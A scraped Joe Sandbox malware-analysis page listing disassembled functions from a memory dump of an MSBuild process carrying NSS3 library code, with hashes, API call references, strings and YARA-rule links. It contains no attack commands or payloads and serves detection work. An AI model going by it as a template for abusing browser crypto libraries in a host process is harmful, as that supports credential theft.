Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 466520f9424298d01c41f450036d049efa0510ef653b0dedf06080d81b9d741d
Instruction ID: f69c29807e484f2134cc8158a5e637c6523872d5204963267597440ba7b96f86
Opcode Fuzzy Hash: 466520f9424298d01c41f450036d049efa0510ef653b0dedf06080d81b9d741d
Instruction Fuzzy Hash: E0110975A002199F8B00CF99C8809EFB7F9EF4C214B16416AED19E7301E630ED118BE1

Function 6CC30D60 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
Instruction ID: a60632663fd3cd85c0ab3b01ecac8ffe8581d2adcdaedd9e0cc329d7168f78cb
Opcode Fuzzy Hash: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
Instruction Fuzzy Hash: BCE06D3B202464A7DB558E09E450AA97399EF81619FA490B9CC5D9BA01E633F8038B81

Function 6CC36E50 Relevance: 42.2, APIs: 19, Strings: 5, Instructions: 213stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6CAECA30: EnterCriticalSection.KERNEL32(?,?,?,6CB4F9C9,?,6CB4F4DA,6CB4F9C9,?,?,6CB1369A), ref: 6CAECA7A
Part of subcall function 6CAECA30: LeaveCriticalSection.KERNEL32(?), ref: 6CAECB26

memset.VCRUNTIME140(00000000,00000000,?,?,6CAFBE66), ref: 6CC36E81
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,6CAFBE66), ref: 6CC36E98
sqlite3_snprintf.NSS3(?,00000000,6CC9AAF9,?,?,?,?,?,?,6CAFBE66), ref: 6CC36EC9
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,6CAFBE66), ref: 6CC36ED2
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,6CAFBE66), ref: 6CC36EF8
sqlite3_snprintf.NSS3(?,00000019,mz_etilqs_,?,?,?,?,?,?,?,6CAFBE66), ref: 6CC36F1F
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,6CAFBE66), ref: 6CC36F28
sqlite3_randomness.NSS3(0000000F,00000000,?,?,?,?,?,?,?,?,?,?,?,6CAFBE66), ref: 6CC36F3D
memset.VCRUNTIME140(?,00000000,?,?,?,?,?,6CAFBE66), ref: 6CC36FA6
sqlite3_snprintf.NSS3(?,00000000,6CC9AAF9,00000000,?,?,?,?,?,?,?,6CAFBE66), ref: 6CC36FDB
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,6CAFBE66), ref: 6CC36FE4
sqlite3_free.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6CAFBE66), ref: 6CC36FEF
sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6CAFBE66), ref: 6CC37014
sqlite3_free.NSS3(00000000,?,?,?,?,6CAFBE66), ref: 6CC3701D
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,6CAFBE66), ref: 6CC37030
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,6CAFBE66), ref: 6CC3705B
sqlite3_free.NSS3(00000000,?,?,?,?,?,6CAFBE66), ref: 6CC37079
sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6CAFBE66), ref: 6CC37097
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,6CAFBE66), ref: 6CC370A0

Strings

winGetTempname4, xrefs: 6CC37046
mz_etilqs_, xrefs: 6CC36F18
winGetTempname5, xrefs: 6CC37071
winGetTempname1, xrefs: 6CC3708F
winGetTempname2, xrefs: 6CC370C4

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: sqlite3_free$strlen$sqlite3_snprintf$CriticalSectionmemset$EnterLeavesqlite3_randomness
String ID: mz_etilqs_$winGetTempname1$winGetTempname2$winGetTempname4$winGetTempname5
API String ID: 593473924-707647140
Opcode ID: 16f5dd6ceac33779cddb9472dca1cd4b5b938258cc02be9b66c0a77058467740
Instruction ID: 5d570704837da47796e60fe759e5dd2e144dc56f3bfd5fbf8a37e2278da8f0e8
Opcode Fuzzy Hash: 16f5dd6ceac33779cddb9472dca1cd4b5b938258cc02be9b66c0a77058467740
Instruction Fuzzy Hash: 4051ACB2A046215BE3109630AC55FFF3676AF86308F144538E9099BBC1FF29951F92E3

Function 6CB98E50 Relevance: 40.4, APIs: 14, Strings: 9, Instructions: 169COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_WrapKey), ref: 6CB98E76
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CB98EA4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CB98EB3

Part of subcall function 6CC7D930: PL_strncpyz.NSS3(?,?,?), ref: 6CC7D963

PR_LogPrint.NSS3(?,00000000), ref: 6CB98EC9
PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6CB98EE5
PL_strncpyz.NSS3(?, hWrappingKey = 0x%x,00000050), ref: 6CB98F17
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CB98F29
PR_LogPrint.NSS3(?,00000000), ref: 6CB98F3F
PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6CB98F71
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CB98F80
PR_LogPrint.NSS3(?,00000000), ref: 6CB98F96
PR_LogPrint.NSS3( pWrappedKey = 0x%p,?), ref: 6CB98FB2
PR_LogPrint.NSS3( pulWrappedKeyLen = 0x%p,?), ref: 6CB98FCD
PR_LogPrint.NSS3( *pulWrappedKeyLen = 0x%x,?), ref: 6CB99047

Strings

hWrappingKey = 0x%x, xrefs: 6CB98F01, 6CB98F11
(CK_INVALID_HANDLE), xrefs: 6CB98EAC, 6CB98F1F, 6CB98F79
pMechanism = 0x%p, xrefs: 6CB98EE0
*pulWrappedKeyLen = 0x%x, xrefs: 6CB99042
hKey = 0x%x, xrefs: 6CB98F5B, 6CB98F6B
pulWrappedKeyLen = 0x%p, xrefs: 6CB98FC8
pWrappedKey = 0x%p, xrefs: 6CB98FAD
C_WrapKey, xrefs: 6CB98E71
hSession = 0x%x, xrefs: 6CB98E8E, 6CB98E9E

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulWrappedKeyLen = 0x%x$ hKey = 0x%x$ hSession = 0x%x$ hWrappingKey = 0x%x$ pMechanism = 0x%p$ pWrappedKey = 0x%p$ pulWrappedKeyLen = 0x%p$ (CK_INVALID_HANDLE)$C_WrapKey
API String ID: 1003633598-4293906258
Opcode ID: b9e2a62963674bac313efcf3c2b6f0bfd33c4fec4b6b754134d7b122cdb00f2f
Instruction ID: ced16c5eb75da925b8987c419f3eb82dbc45bf7438542d36bf48d50c4a11be7a
Opcode Fuzzy Hash: b9e2a62963674bac313efcf3c2b6f0bfd33c4fec4b6b754134d7b122cdb00f2f
Instruction Fuzzy Hash: FD51E531A02145AFDB109F10DC58F9F7BB6EB4331DF094435F509ABA12E7329A18CBA2

Function 6CBC4C10 Relevance: 40.4, APIs: 13, Strings: 10, Instructions: 146stringmemoryCOMMON

Download Yara Rule

APIs

PR_smprintf.NSS3(%s,%s,00000000,?,0000002F,?,?,?,00000000,00000000,?,6CBB4F51,00000000), ref: 6CBC4C50
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6CBB4F51,00000000), ref: 6CBC4C5B
PR_smprintf.NSS3(6CC9AAF9,?,0000002F,?,?,?,00000000,00000000,?,6CBB4F51,00000000), ref: 6CBC4C76
PORT_ZAlloc_Util.NSS3(0000001A,0000002F,?,?,?,00000000,00000000,?,6CBB4F51,00000000), ref: 6CBC4CAE
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CBC4CC9
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CBC4CF4
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CBC4D0B
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6CBB4F51,00000000), ref: 6CBC4D5E
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6CBB4F51,00000000), ref: 6CBC4D68
PR_smprintf.NSS3(0x%08lx=[%s %s],0000002F,?,00000000), ref: 6CBC4D85
PR_smprintf.NSS3(0x%08lx=[%s askpw=%s timeout=%d %s],0000002F,?,?,?,00000000), ref: 6CBC4DA2
free.MOZGLUE(?), ref: 6CBC4DB9
free.MOZGLUE(00000000), ref: 6CBC4DCF

Strings

every, xrefs: 6CBC4CA1
any, xrefs: 6CBC4C96
%s,%s, xrefs: 6CBC4C4B
slotFlags, xrefs: 6CBC4D34
timeout, xrefs: 6CBC4C91
0x%08lx=[%s %s], xrefs: 6CBC4D80
0x%08lx=[%s askpw=%s timeout=%d %s], xrefs: 6CBC4D9D
rust, xrefs: 6CBC4D22
rootFlags, xrefs: 6CBC4D47
ootT, xrefs: 6CBC4D1A

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: free$R_smprintf$strlen$Alloc_Util
String ID: %s,%s$0x%08lx=[%s %s]$0x%08lx=[%s askpw=%s timeout=%d %s]$any$every$ootT$rootFlags$rust$slotFlags$timeout
API String ID: 3756394533-2552752316
Opcode ID: fb18104104403b5999efb9995e81c6cb1d7710d6533aa1737f9aca58aea394d4
Instruction ID: 14e02d6961b7dbcf3e21ec5defa86c7d1e334e873e7689a67046c2ada566e89f
Opcode Fuzzy Hash: fb18104104403b5999efb9995e81c6cb1d7710d6533aa1737f9aca58aea394d4
Instruction Fuzzy Hash: 004149B2A001916BDB116F589C45ABF3675EB82358F188124EC1A5BB01E735DE64CBE3

Function 6CBA2D80 Relevance: 33.4, APIs: 22, Instructions: 381COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,?,?,00000000,?), ref: 6CBA2DEC
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?), ref: 6CBA2E00
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6CBA2E2B
PR_SetError.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6CBA2E43
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,6CB74F1C,?,-00000001,00000000,?), ref: 6CBA2E74
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?,6CB74F1C,?,-00000001,00000000), ref: 6CBA2E88
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6CBA2EC6
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6CBA2EE4
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6CBA2EF8
PR_Unlock.NSS3(?), ref: 6CBA2F62
TlsGetValue.KERNEL32 ref: 6CBA2F86
EnterCriticalSection.KERNEL32(0000001C), ref: 6CBA2F9E
PR_Unlock.NSS3(?), ref: 6CBA2FCA
TlsGetValue.KERNEL32 ref: 6CBA301A
EnterCriticalSection.KERNEL32(?), ref: 6CBA302E
PR_Unlock.NSS3(?), ref: 6CBA3066
PR_SetError.NSS3(00000000,00000000), ref: 6CBA3085
PR_Unlock.NSS3(?), ref: 6CBA30EC
TlsGetValue.KERNEL32 ref: 6CBA310C
EnterCriticalSection.KERNEL32(0000001C), ref: 6CBA3124
PR_Unlock.NSS3(?), ref: 6CBA314C

Part of subcall function 6CB89180: PK11_NeedUserInit.NSS3(?,?,?,00000000,00000001,6CBB379E,?,6CB89568,00000000,?,6CBB379E,?,00000001,?), ref: 6CB8918D
Part of subcall function 6CB89180: PR_SetError.NSS3(FFFFE000,00000000,?,?,?,00000000,00000001,6CBB379E,?,6CB89568,00000000,?,6CBB379E,?,00000001,?), ref: 6CB891A0

Part of subcall function 6CB507A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CAE204A), ref: 6CB507AD
Part of subcall function 6CB507A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CAE204A), ref: 6CB507CD
Part of subcall function 6CB507A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CAE204A), ref: 6CB507D6
Part of subcall function 6CB507A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CAE204A), ref: 6CB507E4
Part of subcall function 6CB507A0: TlsSetValue.KERNEL32(00000000,?,6CAE204A), ref: 6CB50864
Part of subcall function 6CB507A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CB50880
Part of subcall function 6CB507A0: TlsSetValue.KERNEL32(00000000,?,?,6CAE204A), ref: 6CB508CB
Part of subcall function 6CB507A0: TlsGetValue.KERNEL32(?,?,6CAE204A), ref: 6CB508D7
Part of subcall function 6CB507A0: TlsGetValue.KERNEL32(?,?,6CAE204A), ref: 6CB508FB

PR_SetError.NSS3(00000000,00000000), ref: 6CBA316D

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: Value$Unlock$CriticalEnterSection$Error$calloc$InitK11_NeedUser
String ID:
API String ID: 3383223490-0
Opcode ID: a562c8ccd74707e1473f08908fb5ece438ba5162e298330447c3538179294bf8
Instruction ID: b8e5c0390118482217c8e63881a2b502388fe9d85edd1f86be0a792833cf4bc8
Opcode Fuzzy Hash: a562c8ccd74707e1473f08908fb5ece438ba5162e298330447c3538179294bf8
Instruction Fuzzy Hash: 28F17AB1D042499FDF00DFA9D884BAEBBB4FF09318F144169EC44A7611E731E996CB92

Function 6CBC0550 Relevance: 31.7, APIs: 13, Strings: 5, Instructions: 182stringCOMMON

Download Yara Rule

APIs

PR_GetEnvSecure.NSS3(NSS_ALLOW_WEAK_SIGNATURE_ALG,00000002,00000000,?,6CBA5989), ref: 6CBC0571

Part of subcall function 6CB51240: TlsGetValue.KERNEL32(00000040,?,6CB5116C,NSPR_LOG_MODULES), ref: 6CB51267
Part of subcall function 6CB51240: EnterCriticalSection.KERNEL32(?,?,?,6CB5116C,NSPR_LOG_MODULES), ref: 6CB5127C
Part of subcall function 6CB51240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6CB5116C,NSPR_LOG_MODULES), ref: 6CB51291
Part of subcall function 6CB51240: PR_Unlock.NSS3(?,?,?,?,6CB5116C,NSPR_LOG_MODULES), ref: 6CB512A0

PR_GetEnvSecure.NSS3(NSS_HASH_ALG_SUPPORT,?,00000002,00000000,?,6CBA5989), ref: 6CBC05B7
PORT_Strdup_Util.NSS3(00000000,?,?,00000002,00000000,?,6CBA5989), ref: 6CBC05C8
strchr.VCRUNTIME140(00000000,0000003B,?,?,?,00000002,00000000,?,6CBA5989), ref: 6CBC05EC
strstr.VCRUNTIME140(00000001,?), ref: 6CBC0653
free.MOZGLUE(?,?,?,?,00000002,00000000,?,6CBA5989), ref: 6CBC0681
PORT_NewArena_Util.NSS3(00000800,?,?,?,?,00000002,00000000,?,6CBA5989), ref: 6CBC06AB
PL_NewHashTable.NSS3(00000000,6CBBFE80,?,6CC0C350,00000000,00000000,?,?,?,?,?,00000002,00000000,?,6CBA5989), ref: 6CBC06D5
PL_NewHashTable.NSS3(00000000,?,6CC0C350,6CC0C350,00000000,00000000), ref: 6CBC06EC
PL_HashTableAdd.NSS3(?,6CC8E618,6CC8E618), ref: 6CBC070F

Part of subcall function 6CAE2DF0: PL_HashTableRawAdd.NSS3(?,?,?,?,?), ref: 6CAE2E35

PL_HashTableAdd.NSS3(FFFFFFFF,6CC8E618), ref: 6CBC0738
PL_HashTableAdd.NSS3(6CC8E634,6CC8E634), ref: 6CBC0752
PR_SetError.NSS3(FFFFE001,00000000,?,?,?,?,00000002,00000000,?,6CBA5989), ref: 6CBC0767

Strings

NSS_ALLOW_WEAK_SIGNATURE_ALG, xrefs: 6CBC056C
NSS_HASH_ALG_SUPPORT, xrefs: 6CBC05B2
V, xrefs: 6CBC0559
dynamic OID data, xrefs: 6CBC068A
flags, xrefs: 6CBC0555

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: HashTable$SecureUtil$Arena_CriticalEnterErrorSectionStrdup_UnlockValuefreegetenvstrchrstrstr
String ID: NSS_ALLOW_WEAK_SIGNATURE_ALG$NSS_HASH_ALG_SUPPORT$V$dynamic OID data$flags
API String ID: 514890423-4248967104
Opcode ID: 84ffd0a194180593c76554e5bc5c0cbe5e1c2d4d56236dec3742018404a43362
Instruction ID: fc8b5ce73550ce99dfab430813441b45128e5338adebbc7712da840915500c4f
Opcode Fuzzy Hash: 84ffd0a194180593c76554e5bc5c0cbe5e1c2d4d56236dec3742018404a43362
Instruction Fuzzy Hash: 3051DFF1F002C65BEB019F29AC18B673AB4EB86358F180139D818D7B41FB31C6558BA3

Function 6CBA6CD0 Relevance: 30.3, APIs: 20, Instructions: 298stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6CBA6910: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6CBA6943
Part of subcall function 6CBA6910: NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6CBA6957
Part of subcall function 6CBA6910: NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6CBA6972
Part of subcall function 6CBA6910: NSSUTIL_ArgStrip.NSS3(00000000), ref: 6CBA6983
Part of subcall function 6CBA6910: PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6CBA69AA
Part of subcall function 6CBA6910: PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6CBA69BE
Part of subcall function 6CBA6910: PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6CBA69D2
Part of subcall function 6CBA6910: NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6CBA69DF
Part of subcall function 6CBA6910: NSSUTIL_ArgStrip.NSS3(?), ref: 6CBA6A5B

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6CBA6D8C
free.MOZGLUE(00000000), ref: 6CBA6DC5
free.MOZGLUE(?), ref: 6CBA6DD6
free.MOZGLUE(?), ref: 6CBA6DE7
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6CBA6E1F
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CBA6E4B
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CBA6E72
free.MOZGLUE(?), ref: 6CBA6EA7
free.MOZGLUE(?), ref: 6CBA6EC4
free.MOZGLUE(?), ref: 6CBA6ED5
free.MOZGLUE(00000000), ref: 6CBA6EE3
free.MOZGLUE(?), ref: 6CBA6EF4
free.MOZGLUE(?), ref: 6CBA6F08
free.MOZGLUE(00000000), ref: 6CBA6F35
free.MOZGLUE(?), ref: 6CBA6F44
free.MOZGLUE(?), ref: 6CBA6F5B
free.MOZGLUE(00000000), ref: 6CBA6F65

Part of subcall function 6CBA6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6CBA781D,00000000,6CB9BE2C,?,6CBA6B1D,?,?,?,?,00000000,00000000,6CBA781D), ref: 6CBA6C40
Part of subcall function 6CBA6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6CBA781D,?,6CB9BE2C,?), ref: 6CBA6C58
Part of subcall function 6CBA6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6CBA781D), ref: 6CBA6C6F
Part of subcall function 6CBA6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6CBA6C84
Part of subcall function 6CBA6C30: PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6CBA6C96
Part of subcall function 6CBA6C30: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6CBA6CAA

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CBA6F90
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CBA6FC5
PK11_GetInternalKeySlot.NSS3 ref: 6CBA6FF4

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: free$strcmp$strncmp$FlagL_strncasecmp$Strip$InternalK11_ParameterSecureSkipSlot
String ID:
API String ID: 1304971872-0
Opcode ID: 9350cc1d5b8dc398817e45303eded2311a0d078d9d2e7e1c7348a38fafedc9cd
Instruction ID: 625f302e6ebc426742e7df95953dc56f3bb8476eb52a38f1e059f24ecb6be308
Opcode Fuzzy Hash: 9350cc1d5b8dc398817e45303eded2311a0d078d9d2e7e1c7348a38fafedc9cd
Instruction Fuzzy Hash: 8CB161F1E092999FDF00CBE9D844B9EBBB8EF09349F140025E855E7640E731E956CB62

Function 6CBA4C20 Relevance: 30.3, APIs: 20, Instructions: 290memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CBA4C4C
EnterCriticalSection.KERNEL32(?), ref: 6CBA4C60
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6CBA4CA1
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6CBA4CBE
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6CBA4CD2
realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CBA4D3A
PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CBA4D4F
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6CBA4DB7

Part of subcall function 6CC0DD70: TlsGetValue.KERNEL32 ref: 6CC0DD8C
Part of subcall function 6CC0DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CC0DDB4

Part of subcall function 6CB507A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CAE204A), ref: 6CB507AD
Part of subcall function 6CB507A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CAE204A), ref: 6CB507CD
Part of subcall function 6CB507A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CAE204A), ref: 6CB507D6
Part of subcall function 6CB507A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CAE204A), ref: 6CB507E4
Part of subcall function 6CB507A0: TlsSetValue.KERNEL32(00000000,?,6CAE204A), ref: 6CB50864
Part of subcall function 6CB507A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CB50880
Part of subcall function 6CB507A0: TlsSetValue.KERNEL32(00000000,?,?,6CAE204A), ref: 6CB508CB
Part of subcall function 6CB507A0: TlsGetValue.KERNEL32(?,?,6CAE204A), ref: 6CB508D7
Part of subcall function 6CB507A0: TlsGetValue.KERNEL32(?,?,6CAE204A), ref: 6CB508FB

TlsGetValue.KERNEL32 ref: 6CBA4DD7
EnterCriticalSection.KERNEL32(?), ref: 6CBA4DEC
PR_Unlock.NSS3(?), ref: 6CBA4E1B
PR_SetError.NSS3(00000000,00000000), ref: 6CBA4E2F
PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CBA4E5A
PR_SetError.NSS3(00000000,00000000), ref: 6CBA4E71
free.MOZGLUE(00000000), ref: 6CBA4E7A
PR_Unlock.NSS3(?), ref: 6CBA4EA2
TlsGetValue.KERNEL32 ref: 6CBA4EC1
